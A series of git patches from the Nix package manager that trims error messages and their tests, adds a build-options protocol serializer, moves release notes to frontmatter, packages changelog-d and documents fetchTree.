string: %2%", showType(v), printValue(*this, v)) + error("cannot coerce %1% to a string", showType(v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2276,7 +2276,7 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string: %2%", showType(v), printValue(*this, v)) + error("cannot coerce %1% to a string", showType(v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2635,10 +2635,8 @@ void EvalState::printStatistics() std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { - std::stringstream printed; - print(printed); throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), printed.str()) + .msg = hintfmt("cannot coerce %1% to a string", showType()) }); } diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index e54ecc6d1..eb73e9a52 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string: + error: cannot coerce a function to a string diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index 6f0a96f78..ac14f329b 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string: + error: cannot coerce a function to a string diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index c2403bee9..81498f65a 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a Boolean", "true"), + hintfmt("cannot coerce %s to a string", "a Boolean"), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = 1; }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1057,7 +1057,7 @@ namespace nix { ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1143,7 +1143,7 @@ namespace nix { ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string: %s", "an integer", "1"), + hintfmt("cannot coerce %s to a string", "an integer"), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1229,12 +1229,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"drv\"; }", @@ -1279,17 +1279,17 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; FOO = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } From b9980b377ede0aca542b2baeeef9e4538dec20db Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 02:36:33 +0100 Subject: [PATCH 077/654] Update rl-next/source-positions-in-errors for Nix 2.19+ --- doc/manual/rl-next/source-positions-in-errors.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md index 00f0b27e8..15df884ea 100644 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -21,8 +21,6 @@ it: error: … while evaluating an attribute name - at «none»:0: (source not available) - error: value is a set while a string was expected ``` From 6e8d5983143ae576e3f4b1d2954a5267f2943a49 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 02:17:36 +0100 Subject: [PATCH 078/654] tests/lang/eval-fail-bad-string-interpolation-4: init --- .../lang/eval-fail-bad-string-interpolation-4.err.exp | 11 +++++++++++ .../lang/eval-fail-bad-string-interpolation-4.nix | 9 +++++++++ 2 files changed, 20 insertions(+) create mode 100644 tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp create mode 100644 tests/functional/lang/eval-fail-bad-string-interpolation-4.nix diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp new file mode 100644 index 000000000..07843a480 --- /dev/null +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -0,0 +1,11 @@ +error: + … while evaluating a path segment + + at /pwd/lang/eval-fail-bad-string-interpolation-4.nix:9:3: + + 8| # The error message should not be too long. + 9| ''${pkgs}'' + | ^ + 10| + + error: cannot coerce a set to a string diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.nix b/tests/functional/lang/eval-fail-bad-string-interpolation-4.nix new file mode 100644 index 000000000..457b5f06a --- /dev/null +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.nix @@ -0,0 +1,9 @@ +let + # Basically a "billion laughs" attack, but toned down to simulated `pkgs`. + ha = x: y: { a = x y; b = x y; c = x y; d = x y; e = x y; f = x y; g = x y; h = x y; j = x y; }; + has = ha (ha (ha (ha (x: x)))) "ha"; + # A large structure that has already been evaluated. + pkgs = builtins.deepSeq has has; +in +# The error message should not be too long. +''${pkgs}'' From 5417990e313272a5f1129ac39228b111e8dac857 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 14:32:22 -0500 Subject: [PATCH 079/654] Create `ServeProto::BuildOptions` and a serializer for it More tests, and more serializers for Hydra reuse. --- src/libstore/legacy-ssh-store.cc | 22 +++----- src/libstore/serve-protocol.cc | 36 +++++++++++++ src/libstore/serve-protocol.hh | 25 +++++++++ src/nix-store/nix-store.cc | 34 ++++++++----- .../data/serve-protocol/build-options-2.1.bin | Bin 0 -> 16 bytes .../data/serve-protocol/build-options-2.2.bin | Bin 0 -> 24 bytes .../data/serve-protocol/build-options-2.3.bin | Bin 0 -> 40 bytes .../data/serve-protocol/build-options-2.7.bin | Bin 0 -> 48 bytes tests/unit/libstore/serve-protocol.cc | 48 ++++++++++++++++++ 9 files changed, 137 insertions(+), 28 deletions(-) create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.1.bin create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.2.bin create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.3.bin create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.7.bin diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 277445ee6..8ef2daa7b 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -275,20 +275,14 @@ private: void putBuildSettings(Connection & conn) { - conn.to - << settings.maxSilentTime - << settings.buildTimeout; - if (GET_PROTOCOL_MINOR(conn.remoteVersion) >= 2) - conn.to - << settings.maxLogSize; - if (GET_PROTOCOL_MINOR(conn.remoteVersion) >= 3) - conn.to - << 0 // buildRepeat hasn't worked for ages anyway - << 0; - - if (GET_PROTOCOL_MINOR(conn.remoteVersion) >= 7) { - conn.to << ((int) settings.keepFailed); - } + ServeProto::write(*this, conn, ServeProto::BuildOptions { + .maxSilentTime = settings.maxSilentTime, + .buildTimeout = settings.buildTimeout, + .maxLogSize = settings.maxLogSize, + .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway + .enforceDeterminism = 0, + .keepFailed = settings.keepFailed, + }); } public: diff --git a/src/libstore/serve-protocol.cc b/src/libstore/serve-protocol.cc index c37b3095c..08bfad9e4 100644 --- a/src/libstore/serve-protocol.cc +++ b/src/libstore/serve-protocol.cc @@ -98,4 +98,40 @@ void ServeProto::Serialise::write(const StoreDirConfig & s << info.sigs; } + +ServeProto::BuildOptions ServeProto::Serialise::read(const StoreDirConfig & store, ReadConn conn) +{ + BuildOptions options; + options.maxSilentTime = readInt(conn.from); + options.buildTimeout = readInt(conn.from); + if (GET_PROTOCOL_MINOR(conn.version) >= 2) + options.maxLogSize = readNum(conn.from); + if (GET_PROTOCOL_MINOR(conn.version) >= 3) { + options.nrRepeats = readInt(conn.from); + options.enforceDeterminism = readInt(conn.from); + } + if (GET_PROTOCOL_MINOR(conn.version) >= 7) { + options.keepFailed = (bool) readInt(conn.from); + } + return options; +} + +void ServeProto::Serialise::write(const StoreDirConfig & store, WriteConn conn, const ServeProto::BuildOptions & options) +{ + conn.to + << options.maxSilentTime + << options.buildTimeout; + if (GET_PROTOCOL_MINOR(conn.version) >= 2) + conn.to + << options.maxLogSize; + if (GET_PROTOCOL_MINOR(conn.version) >= 3) + conn.to + << options.nrRepeats + << options.enforceDeterminism; + + if (GET_PROTOCOL_MINOR(conn.version) >= 7) { + conn.to << ((int) options.keepFailed); + } +} + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index ada67a149..1665b935f 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -87,6 +87,13 @@ struct ServeProto { ServeProto::Serialise::write(store, conn, t); } + + /** + * Options for building shared between + * `ServeProto::Command::BuildPaths` and + * `ServeProto::Command::BuildDerivation`. + */ + struct BuildOptions; }; enum struct ServeProto::Command : uint64_t @@ -102,6 +109,22 @@ enum struct ServeProto::Command : uint64_t AddToStoreNar = 9, }; + +struct ServeProto::BuildOptions { + /** + * Default value in this and every other field is so tests pass when + * testing older deserialisers which do not set all the fields. + */ + time_t maxSilentTime = -1; + time_t buildTimeout = -1; + size_t maxLogSize = -1; + size_t nrRepeats = -1; + bool enforceDeterminism = -1; + bool keepFailed = -1; + + bool operator == (const ServeProto::BuildOptions &) const = default; +}; + /** * Convenience for sending operation codes. * @@ -144,6 +167,8 @@ template<> DECLARE_SERVE_SERIALISER(BuildResult); template<> DECLARE_SERVE_SERIALISER(UnkeyedValidPathInfo); +template<> +DECLARE_SERVE_SERIALISER(ServeProto::BuildOptions); template DECLARE_SERVE_SERIALISER(std::vector); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 45af7879c..d361dc0ac 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -835,27 +835,33 @@ static void opServe(Strings opFlags, Strings opArgs) verbosity = lvlError; settings.keepLog = false; settings.useSubstitutes = false; - settings.maxSilentTime = readInt(in); - settings.buildTimeout = readInt(in); + + auto options = ServeProto::Serialise::read(*store, rconn); + + // Only certain feilds get initialized based on the protocol + // version. This is why not all the code below is unconditional. + // See how the serialization logic in + // `ServeProto::Serialise` matches + // these conditions. + settings.maxSilentTime = options.maxSilentTime; + settings.buildTimeout = options.buildTimeout; if (GET_PROTOCOL_MINOR(clientVersion) >= 2) - settings.maxLogSize = readNum(in); + settings.maxLogSize = options.maxLogSize; if (GET_PROTOCOL_MINOR(clientVersion) >= 3) { - auto nrRepeats = readInt(in); - if (nrRepeats != 0) { + if (options.nrRepeats != 0) { throw Error("client requested repeating builds, but this is not currently implemented"); } - // Ignore 'enforceDeterminism'. It used to be true by - // default, but also only never had any effect when - // `nrRepeats == 0`. We have already asserted that - // `nrRepeats` in fact is 0, so we can safely ignore this - // without doing something other than what the client - // asked for. - readInt(in); - + // Ignore 'options.enforceDeterminism'. + // + // It used to be true by default, but also only never had + // any effect when `nrRepeats == 0`. We have already + // checked that `nrRepeats` in fact is 0, so we can safely + // ignore this without doing something other than what the + // client asked for. settings.runDiffHook = true; } if (GET_PROTOCOL_MINOR(clientVersion) >= 7) { - settings.keepFailed = (bool) readInt(in); + settings.keepFailed = options.keepFailed; } }; diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.1.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.1.bin new file mode 100644 index 0000000000000000000000000000000000000000..61e1d97286139e43918505b1b953128360d27853 GIT binary patch literal 16 NcmZQ&fB-fq4FCX;01N;C literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.2.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.2.bin new file mode 100644 index 0000000000000000000000000000000000000000..045c2ff2b54ba708bc1d411f0e8786207c4e660a GIT binary patch literal 24 PcmZQ&fB-fq%?_mj0Vn_y literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.3.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.3.bin new file mode 100644 index 0000000000000000000000000000000000000000..5c53458831dca70d5303363919f46f20f88993a2 GIT binary patch literal 40 VcmZQ&fB-fq%?_nGpfn?t1^@!!02}}S literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.7.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.7.bin new file mode 100644 index 0000000000000000000000000000000000000000..1bc7b02db38f5f751c2610de84ff937e630567c9 GIT binary patch literal 48 WcmZQ&fB-fq%?_nGpfrqPgfajFxBwgg literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index c2298c6db..8f256d1e6 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -302,6 +302,54 @@ VERSIONED_CHARACTERIZATION_TEST( }), })) +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_1, + "build-options-2.1", + 2 << 8 | 1, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_2, + "build-options-2.2", + 2 << 8 | 2, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + .maxLogSize = 7, + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_3, + "build-options-2.3", + 2 << 8 | 3, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + .maxLogSize = 7, + .nrRepeats = 8, + .enforceDeterminism = true, + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_7, + "build-options-2.7", + 2 << 8 | 7, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + .maxLogSize = 7, + .nrRepeats = 8, + .enforceDeterminism = false, + .keepFailed = true, + })) + VERSIONED_CHARACTERIZATION_TEST( ServeProtoTest, vector, From 360f3b3a9e0a74eb8b7d5a1744ad58f4cd487ca0 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 19:50:33 +0100 Subject: [PATCH 080/654] changelog-d: Use roberth fork with markdown frontmatter support --- flake.nix | 2 +- misc/changelog-d.cabal.nix | 31 +++++++++++++++++++++++++++++++ misc/changelog-d.nix | 31 +++++++++++++++++++++++++++++++ 3 files changed, 63 insertions(+), 1 deletion(-) create mode 100644 misc/changelog-d.cabal.nix create mode 100644 misc/changelog-d.nix diff --git a/flake.nix b/flake.nix index dbd45f053..90203e7d5 100644 --- a/flake.nix +++ b/flake.nix @@ -182,7 +182,7 @@ "--enable-internal-api-docs" ]; - changelog-d = pkgs.buildPackages.changelog-d; + changelog-d = pkgs.buildPackages.callPackage ./misc/changelog-d.nix { }; nativeBuildDeps = [ diff --git a/misc/changelog-d.cabal.nix b/misc/changelog-d.cabal.nix new file mode 100644 index 000000000..76f9353cd --- /dev/null +++ b/misc/changelog-d.cabal.nix @@ -0,0 +1,31 @@ +{ mkDerivation, aeson, base, bytestring, cabal-install-parsers +, Cabal-syntax, containers, directory, filepath, frontmatter +, generic-lens-lite, lib, mtl, optparse-applicative, parsec, pretty +, regex-applicative, text, pkgs +}: +let rev = "f30f6969e9cd8b56242309639d58acea21c99d06"; +in +mkDerivation { + pname = "changelog-d"; + version = "0.1"; + src = pkgs.fetchurl { + name = "changelog-d-${rev}.tar.gz"; + url = "https://codeberg.org/roberth/changelog-d/archive/${rev}.tar.gz"; + hash = "sha256-8a2+i5u7YoszAgd5OIEW0eYUcP8yfhtoOIhLJkylYJ4="; + } // { inherit rev; }; + isLibrary = false; + isExecutable = true; + libraryHaskellDepends = [ + aeson base bytestring cabal-install-parsers Cabal-syntax containers + directory filepath frontmatter generic-lens-lite mtl parsec pretty + regex-applicative text + ]; + executableHaskellDepends = [ + base bytestring Cabal-syntax directory filepath + optparse-applicative + ]; + doHaddock = false; + description = "Concatenate changelog entries into a single one"; + license = lib.licenses.gpl3Plus; + mainProgram = "changelog-d"; +} diff --git a/misc/changelog-d.nix b/misc/changelog-d.nix new file mode 100644 index 000000000..1b20f4596 --- /dev/null +++ b/misc/changelog-d.nix @@ -0,0 +1,31 @@ +# Taken temporarily from +{ + callPackage, + lib, + haskell, + haskellPackages, +}: + +let + hsPkg = haskellPackages.callPackage ./changelog-d.cabal.nix { }; + + addCompletions = haskellPackages.generateOptparseApplicativeCompletions ["changelog-d"]; + + haskellModifications = + lib.flip lib.pipe [ + addCompletions + haskell.lib.justStaticExecutables + ]; + + mkDerivationOverrides = finalAttrs: oldAttrs: { + + version = oldAttrs.version + "-git-${lib.strings.substring 0 7 oldAttrs.src.rev}"; + + meta = oldAttrs.meta // { + homepage = "https://codeberg.org/roberth/changelog-d"; + maintainers = [ lib.maintainers.roberth ]; + }; + + }; +in + (haskellModifications hsPkg).overrideAttrs mkDerivationOverrides From 3811b334c646bc3b4bf8caef6d13c9f5027246f1 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 19:51:20 +0100 Subject: [PATCH 081/654] rl-next: Use markdown frontmatter syntax The old syntax is still supported, as long as you don't use a { in the description - the reason to migrate. --- doc/manual/rl-next/hash-format-nix32.md | 5 +++-- doc/manual/rl-next/mounted-ssh-store.md | 9 ++++----- doc/manual/rl-next/nix-config-show.md | 11 +++++------ doc/manual/rl-next/nix-env-json-drv-path.md | 9 +++------ doc/manual/rl-next/nix-hash-convert.md | 6 +++--- doc/manual/rl-next/source-positions-in-errors.md | 9 ++++----- doc/manual/src/contributing/hacking.md | 9 ++++----- 7 files changed, 26 insertions(+), 32 deletions(-) diff --git a/doc/manual/rl-next/hash-format-nix32.md b/doc/manual/rl-next/hash-format-nix32.md index 20c557da9..73e6fbb24 100644 --- a/doc/manual/rl-next/hash-format-nix32.md +++ b/doc/manual/rl-next/hash-format-nix32.md @@ -1,6 +1,7 @@ +--- synopsis: Rename hash format `base32` to `nix32` -prs: #9452 -description: { +prs: 9452 +--- Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for [Base32](https://en.wikipedia.org/wiki/Base32). diff --git a/doc/manual/rl-next/mounted-ssh-store.md b/doc/manual/rl-next/mounted-ssh-store.md index 39fac5283..6df44dbb6 100644 --- a/doc/manual/rl-next/mounted-ssh-store.md +++ b/doc/manual/rl-next/mounted-ssh-store.md @@ -1,9 +1,8 @@ +--- synopsis: Mounted SSH Store -issues: #7890 -prs: #7912 -description: { +issues: 7890 +prs: 7912 +--- Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. - -} diff --git a/doc/manual/rl-next/nix-config-show.md b/doc/manual/rl-next/nix-config-show.md index b2ad3c666..26b961b76 100644 --- a/doc/manual/rl-next/nix-config-show.md +++ b/doc/manual/rl-next/nix-config-show.md @@ -1,8 +1,7 @@ -synopsis: `nix config show` -issues: #7672 -prs: #9477 -description: { +--- +synopsis: Rename to `nix config show` +issues: 7672 +prs: 9477 +--- `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. - -} diff --git a/doc/manual/rl-next/nix-env-json-drv-path.md b/doc/manual/rl-next/nix-env-json-drv-path.md index fbe2b67d8..734cefd1b 100644 --- a/doc/manual/rl-next/nix-env-json-drv-path.md +++ b/doc/manual/rl-next/nix-env-json-drv-path.md @@ -1,9 +1,6 @@ +--- synopsis: Fix `nix-env --query --drv-path --json` -prs: #9257 -description: { +prs: 9257 +--- Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. - -} - - diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md index de4367c5b..2b718a66b 100644 --- a/doc/manual/rl-next/nix-hash-convert.md +++ b/doc/manual/rl-next/nix-hash-convert.md @@ -1,6 +1,7 @@ +--- synopsis: Add `nix hash convert` -prs: #9452 -description: { +prs: 9452 +--- New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track to stabilization! Examples: @@ -44,4 +45,3 @@ The following commands are still available but will emit a deprecation warning. - `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. - `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` or even just `nix hash convert $hash1 $hash2` instead. -} diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md index 15df884ea..5b210289d 100644 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -1,7 +1,8 @@ +--- synopsis: Source locations are printed more consistently in errors -issues: #561 -prs: #9555 -description: { +issues: 561 +prs: 9555 +--- Source location information is now included in error messages more consistently. Given this code: @@ -39,5 +40,3 @@ error: error: value is a set while a string was expected ``` - -} diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9de5ad39b..237eff925 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -257,17 +257,16 @@ User-visible changes should come with a release note. Here's what a complete entry looks like. The file name is not incorporated in the document. ``` +--- synopsis: Basically a title -issues: #1234 -prs: #1238 -description: { +issues: 1234 +prs: 1238 +--- Here's one or more paragraphs that describe the change. - It's markdown - Add references to the manual using @docroot@ - -} ``` Significant changes should add the following header, which moves them to the top. From a856f603ed5a124f7eb818dadab6c88da73570fb Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 19:55:47 +0100 Subject: [PATCH 082/654] Add checks.rl-next --- flake.nix | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/flake.nix b/flake.nix index 90203e7d5..f499b0a9b 100644 --- a/flake.nix +++ b/flake.nix @@ -691,6 +691,11 @@ perlBindings = self.hydraJobs.perlBindings.${system}; installTests = self.hydraJobs.installTests.${system}; nixpkgsLibTests = self.hydraJobs.tests.nixpkgsLibTests.${system}; + rl-next = + let pkgs = nixpkgsFor.${system}.native; + in pkgs.buildPackages.runCommand "test-rl-next-release-notes" { } '' + LANG=C.UTF-8 ${(commonDeps { inherit pkgs; }).changelog-d}/bin/changelog-d ${./doc/manual/rl-next} >$out + ''; } // (lib.optionalAttrs (builtins.elem system linux64BitSystems)) { dockerImage = self.hydraJobs.dockerImage.${system}; }); From a63be6578f7e17182fdec8e3d3fdbab19a814152 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 21:22:20 +0100 Subject: [PATCH 083/654] flake.nix: Cache shell inputs through hydra --- flake.nix | 2 ++ 1 file changed, 2 insertions(+) diff --git a/flake.nix b/flake.nix index f499b0a9b..99480183a 100644 --- a/flake.nix +++ b/flake.nix @@ -540,6 +540,8 @@ # Binary package for various platforms. build = forAllSystems (system: self.packages.${system}.nix); + shellInputs = forAllSystems (system: self.devShells.${system}.default.inputDerivation); + buildStatic = lib.genAttrs linux64BitSystems (system: self.packages.${system}.nix-static); buildCross = forAllCrossSystems (crossSystem: From 3c200da242d8f0ccda447866028bb757e0b0bbd9 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 10 Dec 2023 06:16:32 +0100 Subject: [PATCH 084/654] document `fetchTree` (#9258) * document `fetchTree` * display experimental feature note at the top we have to enable the new `fetchTree` experimental feature to render it at all. this was a bug introduced when adding that new feature flag. Co-authored-by: tomberek Co-authored-by: Robert Hensing Co-authored-by: Silvan Mosberger --- doc/manual/generate-builtins.nix | 13 +- doc/manual/generate-settings.nix | 4 +- doc/manual/generate-store-info.nix | 4 +- src/libexpr/primops/fetchTree.cc | 242 ++++++++++++++++++++++++----- src/nix/main.cc | 1 + 5 files changed, 221 insertions(+), 43 deletions(-) diff --git a/doc/manual/generate-builtins.nix b/doc/manual/generate-builtins.nix index 05cae1c46..007b698f1 100644 --- a/doc/manual/generate-builtins.nix +++ b/doc/manual/generate-builtins.nix @@ -8,7 +8,15 @@ let showBuiltin = name: { doc, args, arity, experimental-feature }: let experimentalNotice = optionalString (experimental-feature != null) '' - This function is only available if the [${experimental-feature}](@docroot@/contributing/experimental-features.md#xp-feature-${experimental-feature}) experimental feature is enabled. + > **Note** + > + > This function is only available if the [`${experimental-feature}` experimental feature](@docroot@/contributing/experimental-features.md#xp-feature-${experimental-feature}) is enabled. + > + > For example, include the following in [`nix.conf`](@docroot@/command-ref/conf-file.md): + > + > ``` + > extra-experimental-features = ${experimental-feature} + > ``` ''; in squash '' @@ -17,10 +25,9 @@ let
- ${doc} - ${experimentalNotice} + ${doc}
''; listArgs = args: concatStringsSep " " (map (s: "${s}") args); diff --git a/doc/manual/generate-settings.nix b/doc/manual/generate-settings.nix index 74446b70b..504cda362 100644 --- a/doc/manual/generate-settings.nix +++ b/doc/manual/generate-settings.nix @@ -20,10 +20,10 @@ let else "`${setting}`"; # separate body to cleanly handle indentation body = '' - ${description} - ${experimentalFeatureNote} + ${description} + **Default:** ${showDefault documentDefault defaultValue} ${showAliases aliases} diff --git a/doc/manual/generate-store-info.nix b/doc/manual/generate-store-info.nix index 57247a181..c311c3c39 100644 --- a/doc/manual/generate-store-info.nix +++ b/doc/manual/generate-store-info.nix @@ -19,10 +19,10 @@ let result = squash '' # ${name} - ${doc} - ${experimentalFeatureNote} + ${doc} + ## Settings ${showSettings { prefix = "store-${slug}"; inherit inlineHTML; } settings} diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 15f870a95..eb2df8626 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -187,45 +187,215 @@ static RegisterPrimOp primop_fetchTree({ .name = "fetchTree", .args = {"input"}, .doc = R"( - Fetch a source tree or a plain file using one of the supported backends. - *input* must be a [flake reference](@docroot@/command-ref/new-cli/nix3-flake.md#flake-references), either in attribute 